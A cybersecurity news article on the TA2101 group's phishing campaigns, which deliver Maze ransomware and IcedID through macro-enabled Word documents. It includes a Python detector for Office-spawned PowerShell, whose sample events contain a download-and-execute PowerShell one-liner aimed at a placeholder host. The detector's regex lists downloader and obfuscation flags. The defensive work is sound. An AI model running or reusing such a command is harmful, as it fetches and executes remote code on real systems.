Thursday, March 28, 2024

New Hacking Group Using Metasploit To Install Backdoor Malware On Windows By Exploiting MS Office

Researchers have detected a wave of malware campaigns from a new hacking group named TA2101 that is targeting various organizations in Germany and Italy to deploy backdoor malware on their networks.

Threat actors from this new group use legitimate, licensed penetration-testing tools and backdoor frameworks such as Cobalt Strike and Metasploit to perform post-exploitation operations.

These tools and frameworks are legitimately used by organizations to find vulnerabilities and secure their environments; at the same time, cybercriminal groups such as Cobalt Group, APT32, and APT19 take advantage of their features and use them to deploy malware.

The attackers' campaigns focus on phishing and increasingly sophisticated social engineering, as well as banking Trojans and ransomware.

Researchers also observed this new group distributing Maze ransomware against the infrastructure of Italy-based companies, employing an advanced social engineering technique that impersonates the Italian revenue agency.

Exploiting Windows via Malicious Word Docs

Proofpoint researchers observed this campaign from October 16 until November 12, 2019. The collected samples give a clear indication of the targets and of how the group sends malicious email messages to organizations in Germany, Italy, and the United States, attacking business and IT services, manufacturing, and healthcare.

Among the several samples delivered via malspam emails, most of the attachments were weaponized Word documents.

The email body tempts the victim into opening the attachment and enabling the macro, which then executes a PowerShell script.

The obfuscated PowerShell script eventually downloads the Maze ransomware from the command and control server and installs it on the victim's device.
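The chain described above (a Word macro launching an obfuscated PowerShell downloader) is visible in endpoint telemetry at the parent/child process step. The following is an added detection example, not Proofpoint's or the article's own code: it scores constructed Sysmon-style process-creation events for an Office parent spawning a script host with download or obfuscation arguments, and as an assumption it also covers Excel and PowerPoint parents, not just Word.

```python
from __future__ import annotations
import json
import re
from typing import Iterable

# Office parents the chain starts from. WINWORD matches the article; EXCEL and POWERPNT are
# assumptions added so the rule also covers macro-bearing spreadsheets and slide decks.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line traits typical of obfuscated download-and-run one-liners.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"downloadstring|downloadfile|invoke-webrequest|frombase64string)",
    re.IGNORECASE,
)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation event: 2 for Office -> script host, +1 per suspicious argument."""
    reasons: list[str] = []
    parent, child = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    office_chain = parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN
    if office_chain:
        reasons.append(f"office parent {parent} spawned {child}")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(event.get("CommandLine", ""))})
    if hits:
        reasons.append("suspicious args: " + ", ".join(hits))
    return (2 if office_chain else 0) + len(hits), reasons

def detect(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    """Return an alert record for every event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev.get("ProcessId"), "score": score, "reasons": reasons})
    return alerts

# Constructed Sysmon-style events (JSON lines), not real telemetry; the URL is a placeholder.
SAMPLE_EVENTS = [json.loads(line) for line in r"""
{"ProcessId": 4412, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A..."}
{"ProcessId": 5120, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"}
{"ProcessId": 5388, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"ProcessId": 6204, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')\""}
""".strip().splitlines()]
```

`detect(SAMPLE_EVENTS)` flags only the two Office-spawned script hosts; the admin-run backup script and the print spooler helper spawned by Word stay below the threshold.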

The attackers delivered the ransomware in different email campaigns that referenced law enforcement activity and impersonated the German Federal Ministry of Finance, tempting victims with the prospect of avoiding further tax assessments and penalties.

In the most recent campaign, Proofpoint researchers observed thousands of emails attempting to deliver malicious Microsoft Word attachments with English-language lures, this time impersonating the United States Postal Service (USPS) and distributing the IcedID banking Trojan.

The same weaponized Word document was used in this campaign; once executed, it installs the IcedID payload on targets, mainly in the healthcare vertical, using the same infection chain.

“Researchers also observed a consistent set of TTPs (Tactics, Techniques, and Procedures) that allows attribution of these campaigns to a single actor with high confidence. These include the use of .icu domains, as well as identical email addresses for the Start of Authority (SOA) resource records stored for the DNS entries for the domains used in these campaigns,” Proofpoint said.

You can find the complete analysis and indicators of compromise here to secure your environment.

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.